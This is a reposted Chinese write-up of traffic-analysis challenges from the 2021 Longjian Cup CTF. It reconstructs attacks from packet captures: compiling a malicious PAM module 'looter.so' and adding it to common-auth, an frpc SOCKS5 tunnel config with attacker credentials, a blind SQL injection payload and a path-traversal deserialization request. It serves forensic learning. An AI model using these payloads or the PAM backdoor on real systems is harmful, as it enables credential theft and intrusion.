从陇剑杯学习流量分析

admin 2021年9月28日14:57:15从陇剑杯学习流量分析已关闭评论160 views字数 1710阅读5分42秒阅读模式

JWT

使用wireshark打开附件,追踪HTTP流。

在这里插入图片描述

分析这个JWT字段,到jwt.io下面去解出来

在这里插入图片描述

追踪TCP流,到第10个TCP时,我们可以发现这里实现了命令执行,输出了当前服务器的权限。

在这里插入图片描述

获得命令执行接口后,上传了一个c文件到tmp目录下。

在这里插入图片描述

上传该c文件后,使用makefile操作将这个c文件编译成恶意的so文件。

CFLAGS += -Werror -Wall

looter.so: looter.c
gcc $(CFLAGS) -fPIC -shared -Xlinker -x -o $@ $< -lcurl
  • 1
  • 2
  • 3
  • 4

在第26个数据报中可以看到修改文件内容的命令

command=echo "auth optional looter.so">>/etc/pam.d/common-aut
  • 1

webshell

找到用于web应用登录的用户名和密码

在这里插入图片描述

查看cookie可以看到这是thinkphp的框架,这里也显示了这个web服务器的日志文件目录。

Cookie: PHPSESSID=c7rg88itbq4egddujcpt67mqh6; think_language=zh-CN; think_template=default
  • 1

在这里插入图片描述

由于是一句话木马获取webshell,所以权限是www-data

在这里插入图片描述

查看攻击者使用的代理工具

在这里插入图片描述

将上面的字符串L3Zhci93d3cvaHRtbC9mcnBj进行base64解码,得知代理工具为frpc

同时,将后面的十六进制数值进行解码,得到以下信息。

[common]
server_addr = 192.168.239.123
server_port = 7778
token=Xa3BJf2l5enmN6Z7A8mv

[test_sock5]
type = tcp
remote_port =8111
plugin = socks5
plugin_user = 0HDFt16cLQJ
plugin_passwd = JTN276Gp
use_encryption = true
use_compression = true
  • 1
  • 2
  • 3
  • 4
  • 5
  • 6
  • 7
  • 8
  • 9
  • 10
  • 11
  • 12
  • 13

sql注入

日志文件中使用了sql盲注进行数据的爆破

1 and if(substr(database(),1,1) = 'w',1,(select table_name from information_schema.tables))
  • 1

if函数,如果第一个表达式的值为真,那么返回第二个表达式的值。如果为假,那么返回第二个表达式的值。

同时,我们知道,sql盲注在获得第一个字符后,就会终止爆破,去查找第二个字符。

在这里插入图片描述

以此类推,可以获得这里的数据库名以及其他信息。

日志分析

源码泄露

在这里插入图片描述

反序列化

GET /?filename=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Ftmp%2Fsess_car&content=func%7CN%3Bfiles%7Ca%3A2%3A%7Bs%3A8%3A%22filename%22%3Bs%3A16%3A%22.%2Ffiles%2Ffilename%22%3Bs%3A20%3A%22call_user_func_array%22%3Bs%3A28%3A%22.%2Ffiles%2Fcall_user_func_array%22%3B%7Dpaths%7Ca%3A1%3A%7Bs%3A5%3A%22%2Fflag%22%3Bs%3A13%3A%22SplFileObject%22%3B%7D
ser_func_array%22%3B%7Dpaths%7Ca%3A1%3A%7Bs%3A5%3A%22%2Fflag%22%3Bs%3A13%3A%22SplFileObject%22%3B%7D
  • 1
  • 2

相关推荐: 2021陇剑杯网络安全大赛-webshell

题目描述: 单位网站被黑客挂马,请您从流量中分析出webshell,进行回答: 解题思路: 3.1黑客登录系统使用的密码是__Admin123!@#。 3.2黑客修改了一个日志文件,文件的绝对路径为_/var/www/html/data/Runtime/Log…

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2021年9月28日14:57:15
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   从陇剑杯学习流量分析http://cn-sec.com/archives/555887.html